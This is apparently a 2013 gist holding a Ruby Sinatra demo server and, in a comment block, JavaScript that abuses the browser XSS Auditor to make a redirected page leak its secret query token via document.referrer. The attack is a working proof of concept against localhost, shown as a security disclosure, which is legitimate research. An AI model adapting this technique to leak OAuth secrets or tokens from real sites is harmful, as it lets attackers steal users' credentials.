homakov / demo.rb

Created February 03, 2013

require 'sinatra'
require 'securerandom'
 
=begin
Execute the following JavaScript on any domain, you can use web
inspector console.
Set noblock to remove mode=block and see <form> action=about:blank
case(requires user interaction)

var block = false;

if(block){
  var cut_me = encodeURIComponent('<script
src="http://localhost:4567/some.js"></script>');
}else{
  var cut_me = encodeURIComponent('<form action="/asdf">');
}
var playground = window.open(
'http://127.0.0.1:4567/auth?'+(block?'':'noblock=1&')+'state='+cut_me,
'n','height=1,width=1');

var int = setInterval(function(){
  if(playground.document){
        //it's about:blank now!
    alert('Leaked: '+playground.document.referrer);
    playground.close();
    clearInterval(int);
  }
}, 100);
=end
 
get '/auth' do
  redirect "/#{'noblock' if
params[:noblock]}?secret=#{SecureRandom.hex(10)}&state=#{params[:state]}"
end
 
get '/' do
#sinatra sends X-XSS-Protection:1; mode=block by default
  return r=<<HTML
<html>
  <head>
    <script src="http://localhost:4567/some.js"></script>
  </head>
</html>
HTML
end
 
get '/noblock' do
  headers['X-XSS-Protection'] = '1;' #no block mode
 
  return r=<<HTML
<html>
  <head>
    <script src="http://localhost:4567/some.js"></script>
  </head>
  <body>
    <form action="/asdf">
      <input type="submit" value="CLICK ME! NOW!">
      <input name="one" value="two">
    </form>
    <a href="javascript:omg(0)">link</a>
  </body>
</html>
HTML
end
 
get '/some.js' do
  'console.log("swaaag")'
end